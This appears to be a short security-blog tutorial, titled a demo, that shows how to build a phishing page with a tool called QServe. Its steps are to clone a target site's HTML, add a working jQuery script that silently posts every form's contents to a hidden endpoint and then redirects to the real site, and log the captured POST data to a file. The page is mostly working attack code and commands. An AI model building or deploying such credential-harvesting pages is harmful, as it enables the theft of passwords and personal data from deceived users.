MEH Security

QServe Phishing Demo

This demo utilizes QServe. QServe

Windows x64 quick download

Go to the website and download the target page through chrome

Open the folder with VS Code or your favorite editor

Rename the .html file to index.html

Now create a new file called phish.js

Inside that file, we'll paste this code:

$(document).ready(function() {
    $("form").submit(function(e) {
        var form = $(this);
        var newUrl = form.attr('action');
        $.ajax({
            url: "/phish-dsafdsaasdfgsadffg",
            type: form.attr('method'),
            data: form.serialize(),
            error: function(e) {
                document.location.replace(newUrl);
            }
        });
        return false;
    });
});

Last modification to the page, we'll add these two lines somewhere to the index.html file, inside the <head> tag.

<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.4.1/jquery.js"></script>
<script src="/phish.js"></script>

Save the page, open the folder with a command prompt/terminal, start qserve

qserve -l -c

-l or --log means we log all activity

-c or --capture-post means we separately log POST data

Load the site (go to localhost), then enter some data into the form. Boom.

Since we used the -c option, not only is the data logged to the console, but it's also saved to POST_log.txt.

QServe makes this process identical on Windows and Linux (and maybe OSX?). Either enable logging, or just wait for the red text in your console.